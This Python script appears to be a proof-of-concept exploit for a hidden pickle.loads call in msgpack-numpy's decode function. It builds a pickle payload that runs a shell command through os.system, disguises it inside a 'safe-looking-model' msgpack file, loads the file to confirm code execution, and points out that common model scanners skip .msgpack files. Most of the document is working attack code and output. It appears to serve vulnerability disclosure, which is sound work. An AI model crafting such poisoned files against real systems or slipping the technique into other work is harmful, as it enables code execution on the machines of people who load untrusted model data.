#!/usr/bin/env python3
"""
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()

VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
data when the serialized array has dtype kind 'O' (object). This enables
arbitrary code execution when loading any msgpack file that uses msgpack_numpy
for deserialization.

The vulnerable code in msgpack_numpy.py decode():
    if b'kind' in obj and obj[b'kind'] == b'O':
        return pickle.loads(obj[b'data'])

An attacker can craft a .msgpack file where any array field has kind='O'
and data=<malicious_pickle_payload>, achieving RCE on deserialization.

This is particularly dangerous because:
1. MessagePack is considered a "safe" serialization format
2. Users expect msgpack files to contain only data, not executable code
3. The pickle.loads() call is hidden inside the msgpack extension hooks
4. No scanner (modelscan, picklescan) checks .msgpack files

Affected: msgpack-numpy <= 0.4.8 (all versions)
"""

import msgpack
import msgpack_numpy as m
import pickle
import os
import sys
import numpy as np

MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"

# ============================================================
# Step 1: Show how msgpack_numpy normally works
# ============================================================
print("[*] Demonstrating normal msgpack_numpy usage...")
normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)}
packed_normal = msgpack.packb(normal_data, default=m.encode)
unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False)
print(f"[+] Normal round-trip: {unpacked_normal}")

# ============================================================
# Step 2: Create a malicious payload
# ============================================================
print("\n[*] Creating malicious msgpack payload...")

class MaliciousPayload:
    def __reduce__(self):
        cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}"
        return (os.system, (cmd,))

malicious_pickle = pickle.dumps(MaliciousPayload())

# Craft the msgpack structure that triggers pickle.loads in decode()
# The decode function checks: b'nd' in obj AND obj[b'kind'] == b'O'
# Then calls: pickle.loads(obj[b'data'])
malicious_array = {
    b'nd': True,          # Marks this as an ndarray
    b'kind': b'O',        # Object dtype -> triggers pickle.loads()
    b'data': malicious_pickle,  # Pickle payload with RCE
    b'shape': (1,),       # Shape (cosmetic, not used before pickle.loads)
    b'type': b'O',        # Dtype descriptor (cosmetic)
}

# Embed in a realistic model structure
model_data = {
    "model_name": "safe-looking-model",
    "version": "1.0.0",
    "weights": malicious_array,  # <-- malicious
}

packed = msgpack.packb(model_data, use_bin_type=True)
malicious_path = "/tmp/malicious_model.msgpack"
with open(malicious_path, 'wb') as f:
    f.write(packed)

print(f"[+] Malicious msgpack file saved to {malicious_path}")
print(f"    File size: {len(packed)} bytes")

# ============================================================
# Step 3: Clean marker file
# ============================================================
if os.path.exists(MARKER_FILE):
    os.remove(MARKER_FILE)

# ============================================================
# Step 4: Load the malicious file (triggers RCE)
# ============================================================
print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
with open(malicious_path, 'rb') as f:
    loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)

print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")

# ============================================================
# Step 5: Verify RCE
# ============================================================
if os.path.exists(MARKER_FILE):
    with open(MARKER_FILE) as f:
        content = f.read().strip()
    print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
    print(f"[!!!] Marker file contents:\n{content}")
    os.remove(MARKER_FILE)
else:
    print("\n[-] RCE marker file not found")
    sys.exit(1)

# ============================================================
# Step 6: Scanner evasion verification
# ============================================================
print("\n" + "="*60)
print("SCANNER EVASION")
print("="*60)
print("""
Neither modelscan nor picklescan scan .msgpack files at all.

  modelscan -p /tmp/malicious_model.msgpack
  # -> Skips file (unsupported format)

  picklescan -p /tmp/malicious_model.msgpack
  # -> Scanned files: 0, Infected files: 0

The pickle payload is embedded inside a msgpack structure,
completely invisible to all current model security scanners.
""")

print("="*60)
print("VULNERABILITY SUMMARY")
print("="*60)
print(f"""
Library:     msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'}
File:        msgpack_numpy.py, decode() function
Root cause:  pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
Trigger:     Any msgpack file loaded with object_hook=msgpack_numpy.decode
Attack:      Set array kind='O' and data=<malicious_pickle_bytes>
Impact:      Arbitrary code execution on file load
Scanners:    modelscan - NOT APPLICABLE (.msgpack not scanned)
             picklescan - NOT APPLICABLE (.msgpack not scanned)

Real-world usage: msgpack-numpy is used for ML data serialization,
feature embeddings, and intermediate model storage. Any application
loading untrusted .msgpack files with msgpack_numpy is vulnerable.
""")